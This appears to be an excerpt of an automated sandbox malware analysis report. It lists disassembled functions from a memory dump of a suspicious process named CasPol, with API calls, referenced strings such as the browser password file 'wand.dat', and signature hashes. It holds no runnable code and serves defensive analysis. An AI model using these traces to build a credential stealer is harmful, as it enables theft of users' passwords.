                                                                                                                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                  • String ID: MS Sans Serif
                                                                                                                  • API String ID: 210187428-168460110
                                                                                                                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                  • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                  • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memcmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3384217055-0
                                                                                                                  • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                  • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                  • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                  • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040560C
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                  • String ID: *.*$dat$wand.dat
                                                                                                                  • API String ID: 2618321458-1828844352
                                                                                                                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00412057
                                                                                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3550944819-0
                                                                                                                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                  APIs
                                                                                                                  • free.MSVCRT ref: 0040F561
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$free
                                                                                                                  • String ID: g4@
                                                                                                                  • API String ID: 2888793982-2133833424
                                                                                                                  • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                  • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004144E7
                                                                                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                    • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                  • memset.MSVCRT ref: 0041451A
                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1127616056-0
                                                                                                                  • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                  • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                  APIs
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                  • malloc.MSVCRT ref: 00417459
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                                  • free.MSVCRT ref: 0041747F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2605342592-0
                                                                                                                  • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                  • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                  • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2678498856-0
                                                                                                                  • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                  • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040F673
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                  • strlen.MSVCRT ref: 0040F6A2
                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2754987064-0
                                                                                                                  • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                  • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040F6E2
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                  • strlen.MSVCRT ref: 0040F70D
                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2754987064-0
                                                                                                                  • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                  • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 764393265-0
                                                                                                                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                  APIs
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$System$File$LocalSpecific
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 979780441-0
                                                                                                                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                  • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1386444988-0
                                                                                                                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                  APIs
                                                                                                                  • wcschr.MSVCRT ref: 0040F79E
                                                                                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: wcschr$memcpywcslen
                                                                                                                  • String ID: "
                                                                                                                  • API String ID: 1983396471-123907689
                                                                                                                  • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                  • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                  APIs
                                                                                                                  • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintfmemcpy
                                                                                                                  • String ID: %2.2X
                                                                                                                  • API String ID: 2789212964-323797159
                                                                                                                  • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                  • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040E770
                                                                                                                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendmemset
                                                                                                                  • String ID: F^@
                                                                                                                  • API String ID: 568519121-3652327722
                                                                                                                  • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                  • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PlacementWindowmemset
                                                                                                                  • String ID: WinPos
                                                                                                                  • API String ID: 4036792311-2823255486
                                                                                                                  • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                  • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1860491036-0
                                                                                                                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                  APIs
                                                                                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                  • free.MSVCRT ref: 0040A908
                                                                                                                  • free.MSVCRT ref: 0040A92B
                                                                                                                  • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 726966127-0
                                                                                                                  • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                  • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                  APIs
                                                                                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                  • free.MSVCRT ref: 0040B201
                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                  • free.MSVCRT ref: 0040B224
                                                                                                                  • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 726966127-0
                                                                                                                  • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                  • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                  APIs
                                                                                                                  • strlen.MSVCRT ref: 0040B0D8
                                                                                                                  • free.MSVCRT ref: 0040B0FB
                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                  • free.MSVCRT ref: 0040B12C
